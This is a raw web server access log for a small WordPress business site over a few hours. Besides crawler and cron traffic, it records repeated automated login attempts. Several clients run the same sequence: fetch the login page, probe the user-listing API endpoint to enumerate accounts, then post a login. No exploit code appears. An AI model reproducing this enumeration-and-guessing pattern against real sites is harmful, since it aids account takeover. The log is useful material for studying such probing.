10.213.116.211 - - [26/Oct/2022:10:10:02 -0700] "POST /wp-cron.php?doing_wp_cron=1666804202.2238280773162841796875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666804202.2238280773162841796875" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:10:30:06 -0700] "POST /wp-login.php HTTP/1.1" 500 5259 "-" "Mozilla/5.0" "gatipackers.com"
121.4.79.217 - - [26/Oct/2022:10:33:41 -0700] "GET / HTTP/1.1" 200 14562 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "gatipackers.com"
10.213.116.209 - - [26/Oct/2022:10:33:45 -0700] "POST /wp-cron.php?doing_wp_cron=1666805625.2883949279785156250000 HTTP/1.1" 200 - "https://gatipackers.com/wp-cron.php?doing_wp_cron=1666805625.2883949279785156250000" "WordPress/5.6.10; https://gatipackers.com" "gatipackers.com"
121.4.79.217 - - [26/Oct/2022:10:33:51 -0700] "GET / HTTP/1.1" 200 14562 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "gatipackers.com"
161.35.52.207 - - [26/Oct/2022:10:48:38 -0700] "POST /wp-login.php HTTP/1.1" 200 8268 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "gatipackers.com"
10.213.116.210 - - [26/Oct/2022:10:48:42 -0700] "POST /wp-cron.php?doing_wp_cron=1666806522.8832139968872070312500 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666806522.8832139968872070312500" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:10:49:31 -0700] "POST /wp-login.php HTTP/1.1" 200 8264 "-" "Mozilla/5.0" "gatipackers.com"
94.233.241.249 - - [26/Oct/2022:10:51:24 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "gatipackers.com"
94.233.241.249 - - [26/Oct/2022:10:51:25 -0700] "GET / HTTP/1.1" 200 14533 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "gatipackers.com"
94.233.241.249 - - [26/Oct/2022:10:51:30 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13884 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "gatipackers.com"
40.77.167.102 - - [26/Oct/2022:11:03:11 -0700] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.gatipackers.com"
157.55.39.220 - - [26/Oct/2022:11:03:22 -0700] "GET /online_quote HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.gatipackers.com"
89.26.248.147 - - [26/Oct/2022:11:06:04 -0700] "GET /wp-login.php HTTP/1.1" 200 7988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
89.26.248.147 - - [26/Oct/2022:11:06:11 -0700] "GET //wp-json/wp/v2/users/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:11:06:10 -0700] "POST /wp-cron.php?doing_wp_cron=1666807569.9730119705200195312500 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666807569.9730119705200195312500" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:11:09:49 -0700] "POST /wp-login.php HTTP/1.1" 200 8257 "-" "Mozilla/5.0" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:11:09:53 -0700] "POST /wp-cron.php?doing_wp_cron=1666807793.5760519504547119140625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666807793.5760519504547119140625" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
84.17.43.12 - - [26/Oct/2022:11:10:11 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36" "gatipackers.com"
84.17.43.12 - - [26/Oct/2022:11:10:12 -0700] "GET / HTTP/1.1" 200 14533 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36" "gatipackers.com"
84.17.43.12 - - [26/Oct/2022:11:10:16 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13884 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36" "gatipackers.com"
188.165.198.224 - - [26/Oct/2022:11:13:01 -0700] "POST /wp-login.php HTTP/1.1" 200 8258 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:11:29:32 -0700] "POST /wp-login.php HTTP/1.1" 200 8264 "-" "Mozilla/5.0" "gatipackers.com"
10.213.116.210 - - [26/Oct/2022:11:29:36 -0700] "POST /wp-cron.php?doing_wp_cron=1666808976.5751280784606933593750 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666808976.5751280784606933593750" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
66.249.69.13 - - [26/Oct/2022:11:29:57 -0700] "GET /get_a_quote HTTP/1.1" 200 8156 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "gatipackers.com"
66.249.69.9 - - [26/Oct/2022:11:29:57 -0700] "GET /get_a_quote HTTP/1.1" 200 8156 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "gatipackers.com"
66.249.69.9 - - [26/Oct/2022:11:31:21 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Googlebot-Image/1.0" "gatipackers.com"
217.21.74.226 - - [26/Oct/2022:11:36:53 -0700] "POST /wp-login.php HTTP/1.1" 200 8263 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:11:49:28 -0700] "POST /wp-login.php HTTP/1.1" 200 8259 "-" "Mozilla/5.0" "gatipackers.com"
10.213.116.210 - - [26/Oct/2022:11:49:32 -0700] "POST /wp-cron.php?doing_wp_cron=1666810172.3022940158843994140625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666810172.3022940158843994140625" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
207.46.13.54 - - [26/Oct/2022:11:54:23 -0700] "GET /moving_tips HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "gatipackers.com"
139.59.85.224 - - [26/Oct/2022:12:00:57 -0700] "POST /wp-login.php HTTP/1.1" 200 8255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36" "gatipackers.com"
10.213.116.210 - - [26/Oct/2022:12:01:01 -0700] "POST /wp-cron.php?doing_wp_cron=1666810861.1167709827423095703125 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666810861.1167709827423095703125" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
45.86.202.151 - - [26/Oct/2022:12:03:30 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.86 Safari/537.36" "gatipackers.com"
45.86.202.151 - - [26/Oct/2022:12:03:30 -0700] "GET / HTTP/1.1" 200 14533 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.86 Safari/537.36" "gatipackers.com"
45.86.202.151 - - [26/Oct/2022:12:03:40 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13884 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.86 Safari/537.36" "gatipackers.com"
10.213.116.209 - - [26/Oct/2022:12:08:40 -0700] "POST /wp-cron.php?doing_wp_cron=1666811320.5436511039733886718750 HTTP/1.1" 200 - "https://gatipackers.com/wp-cron.php?doing_wp_cron=1666811320.5436511039733886718750" "WordPress/5.6.10; https://gatipackers.com" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:12:09:43 -0700] "POST /wp-login.php HTTP/1.1" 200 8257 "-" "Mozilla/5.0" "gatipackers.com"
159.203.121.12 - - [26/Oct/2022:12:24:43 -0700] "POST /wp-login.php HTTP/1.1" 200 8257 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:12:24:50 -0700] "POST /wp-cron.php?doing_wp_cron=1666812290.6800820827484130859375 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666812290.6800820827484130859375" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:12:29:50 -0700] "POST /wp-login.php HTTP/1.1" 500 4915 "-" "Mozilla/5.0" "gatipackers.com"
149.62.37.102 - - [26/Oct/2022:12:35:58 -0700] "GET /wp-login.php HTTP/1.1" 200 7995 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
149.62.37.102 - - [26/Oct/2022:12:36:03 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
149.62.37.102 - - [26/Oct/2022:12:36:04 -0700] "POST /wp-login.php HTTP/1.1" 200 8265 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
217.21.87.64 - - [26/Oct/2022:12:43:28 -0700] "GET /wp-login.php HTTP/1.1" 200 7996 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
217.21.87.64 - - [26/Oct/2022:12:43:35 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
217.21.87.64 - - [26/Oct/2022:12:43:35 -0700] "POST /wp-login.php HTTP/1.1" 200 8257 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.209 - - [26/Oct/2022:12:43:33 -0700] "POST /wp-cron.php?doing_wp_cron=1666813412.9867310523986816406250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666813412.9867310523986816406250" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
212.110.92.155 - - [26/Oct/2022:12:48:03 -0700] "POST /wp-login.php HTTP/1.1" 200 8255 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36" "gatipackers.com"
66.249.88.27 - - [26/Oct/2022:12:48:26 -0700] "GET / HTTP/1.1" 200 14562 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P; Google-AdWords-Express) AppleWebKit/[WEBKIT_VERSION] (KHTML, like Gecko) Chrome/[CHROME_VERSION] Mobile Safari/[WEBKIT_VERSION]" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:12:50:26 -0700] "POST /wp-login.php HTTP/1.1" 200 8257 "-" "Mozilla/5.0" "gatipackers.com"
217.21.90.24 - - [26/Oct/2022:12:50:32 -0700] "GET /wp-login.php HTTP/1.1" 200 7991 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
217.21.90.24 - - [26/Oct/2022:12:50:35 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
217.21.90.24 - - [26/Oct/2022:12:50:36 -0700] "POST /wp-login.php HTTP/1.1" 200 8261 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
157.55.39.220 - - [26/Oct/2022:12:51:53 -0700] "GET /online_quote HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "gatipackers.com"
207.148.82.155 - - [26/Oct/2022:12:59:45 -0700] "GET /wp-login.php HTTP/1.1" 200 7990 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
207.148.82.155 - - [26/Oct/2022:12:59:51 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.209 - - [26/Oct/2022:12:59:50 -0700] "POST /wp-cron.php?doing_wp_cron=1666814389.9827649593353271484375 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666814389.9827649593353271484375" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
207.148.82.155 - - [26/Oct/2022:12:59:52 -0700] "POST /wp-login.php HTTP/1.1" 200 8258 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
36.40.72.66 - - [26/Oct/2022:13:05:28 -0700] "GET / HTTP/1.1" 200 14533 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "gatipackers.com"
114.119.145.239 - - [26/Oct/2022:13:10:11 -0700] "GET /wp-content/plugins?C=S%3BO%3DA HTTP/1.1" 301 1432 "https://gatipackers.com/wp-content/plugins?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
114.119.145.239 - - [26/Oct/2022:13:10:16 -0700] "GET /wp-content/plugins/?C=S%3BO%3DA HTTP/1.1" 200 - "https://gatipackers.com/wp-content/plugins?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:13:11:08 -0700] "POST /wp-login.php HTTP/1.1" 200 8258 "-" "Mozilla/5.0" "gatipackers.com"
10.213.116.210 - - [26/Oct/2022:13:11:12 -0700] "POST /wp-cron.php?doing_wp_cron=1666815072.3475670814514160156250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666815072.3475670814514160156250" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
142.93.201.0 - - [26/Oct/2022:13:11:40 -0700] "POST /wp-login.php HTTP/1.1" 200 8261 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" "gatipackers.com"
114.119.145.239 - - [26/Oct/2022:13:19:26 -0700] "GET /robots.txt HTTP/1.1" 200 58 "https://www.gatipackers.com?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
195.179.237.6 - - [26/Oct/2022:13:26:30 -0700] "GET /wp-login.php HTTP/1.1" 200 7990 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
195.179.237.6 - - [26/Oct/2022:13:26:36 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.210 - - [26/Oct/2022:13:26:34 -0700] "POST /wp-cron.php?doing_wp_cron=1666815994.5813910961151123046875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666815994.5813910961151123046875" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
195.179.237.6 - - [26/Oct/2022:13:26:36 -0700] "POST /wp-login.php HTTP/1.1" 200 8259 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:13:31:29 -0700] "POST /wp-login.php HTTP/1.1" 500 4915 "-" "Mozilla/5.0" "gatipackers.com"
153.92.220.15 - - [26/Oct/2022:13:32:26 -0700] "GET /wp-login.php HTTP/1.1" 200 7986 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
153.92.220.15 - - [26/Oct/2022:13:32:31 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
153.92.220.15 - - [26/Oct/2022:13:32:32 -0700] "POST /wp-login.php HTTP/1.1" 200 8258 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
13.81.59.92 - - [26/Oct/2022:13:35:29 -0700] "POST /wp-login.php HTTP/1.1" 200 8259 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "gatipackers.com"
217.21.84.149 - - [26/Oct/2022:13:41:56 -0700] "GET /wp-login.php HTTP/1.1" 200 7986 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:13:42:03 -0700] "POST /wp-cron.php?doing_wp_cron=1666816923.1001720428466796875000 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666816923.1001720428466796875000" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
217.21.84.149 - - [26/Oct/2022:13:42:04 -0700] "GET /wp-login.php HTTP/1.1" 200 7997 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "www.gatipackers.com"
217.21.84.149 - - [26/Oct/2022:13:42:10 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "www.gatipackers.com"
217.21.84.149 - - [26/Oct/2022:13:42:11 -0700] "POST /wp-login.php HTTP/1.1" 200 8270 "http://www.gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fwww.gatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "www.gatipackers.com"
180.163.29.219 - - [26/Oct/2022:13:47:24 -0700] "GET / HTTP/1.1" 200 14533 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "gatipackers.com"
180.163.29.219 - - [26/Oct/2022:13:47:29 -0700] "GET /wp-includes/js/wp-embed.min.js?ver=5.6.10 HTTP/1.1" 200 1426 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:13:51:38 -0700] "POST /wp-login.php HTTP/1.1" 500 4907 "-" "Mozilla/5.0" "gatipackers.com"
61.219.43.253 - - [26/Oct/2022:13:59:06 -0700] "POST /wp-login.php HTTP/1.1" 200 8256 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36" "gatipackers.com"
10.213.116.210 - - [26/Oct/2022:13:59:11 -0700] "POST /wp-cron.php?doing_wp_cron=1666817951.3503649234771728515625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666817951.3503649234771728515625" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:14:12:15 -0700] "POST /wp-login.php HTTP/1.1" 200 8270 "-" "Mozilla/5.0" "gatipackers.com"
145.14.152.172 - - [26/Oct/2022:14:12:15 -0700] "GET /wp-login.php HTTP/1.1" 200 7995 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
145.14.152.172 - - [26/Oct/2022:14:12:21 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:14:12:19 -0700] "POST /wp-cron.php?doing_wp_cron=1666818739.5943679809570312500000 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666818739.5943679809570312500000" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
145.14.152.172 - - [26/Oct/2022:14:12:21 -0700] "POST /wp-login.php HTTP/1.1" 200 8257 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
62.16.6.249 - - [26/Oct/2022:14:14:00 -0700] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
62.16.6.249 - - [26/Oct/2022:14:14:01 -0700] "GET / HTTP/1.1" 200 14533 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
62.16.6.249 - - [26/Oct/2022:14:14:05 -0700] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 13884 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
45.132.157.136 - - [26/Oct/2022:14:14:52 -0700] "GET /wp-login.php HTTP/1.1" 200 7988 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
45.132.157.136 - - [26/Oct/2022:14:14:56 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
45.132.157.136 - - [26/Oct/2022:14:14:57 -0700] "POST /wp-login.php HTTP/1.1" 200 8256 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
172.105.22.48 - - [26/Oct/2022:14:29:43 -0700] "GET /wp-login.php HTTP/1.1" 200 7995 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
172.105.22.48 - - [26/Oct/2022:14:29:49 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.210 - - [26/Oct/2022:14:29:48 -0700] "POST /wp-cron.php?doing_wp_cron=1666819788.2950270175933837890625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666819788.2950270175933837890625" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
172.105.22.48 - - [26/Oct/2022:14:29:49 -0700] "POST /wp-login.php HTTP/1.1" 200 8265 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:14:32:38 -0700] "POST /wp-login.php HTTP/1.1" 200 8257 "-" "Mozilla/5.0" "gatipackers.com"
54.81.14.98 - - [26/Oct/2022:14:45:37 -0700] "GET /wp-login.php HTTP/1.1" 200 7988 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
54.81.14.98 - - [26/Oct/2022:14:45:43 -0700] "GET /wp-json/wp/v2/users HTTP/1.1" 404 88 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
10.213.116.211 - - [26/Oct/2022:14:45:41 -0700] "POST /wp-cron.php?doing_wp_cron=1666820741.5817699432373046875000 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666820741.5817699432373046875000" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
54.81.14.98 - - [26/Oct/2022:14:45:43 -0700] "POST /wp-login.php HTTP/1.1" 200 8258 "http://gatipackers.com/wp-login.php?redirect_to=http%3A%2F%2Fgatipackers.com%2Fwp-admin%2F" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
212.110.92.155 - - [26/Oct/2022:14:46:35 -0700] "POST /wp-login.php HTTP/1.1" 200 8259 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" "gatipackers.com"
4.240.125.106 - - [26/Oct/2022:14:53:16 -0700] "POST /wp-login.php HTTP/1.1" 200 8264 "-" "Mozilla/5.0" "gatipackers.com"
10.213.116.209 - - [26/Oct/2022:14:53:20 -0700] "POST /wp-cron.php?doing_wp_cron=1666821200.8285779953002929687500 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1666821200.8285779953002929687500" "WordPress/5.6.10; http://gatipackers.com" "gatipackers.com"
103.200.23.120 - - [26/Oct/2022:14:55:50 -0700] "GET /wp-login.php HTTP/1.1" 200 7990 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" "gatipackers.com"
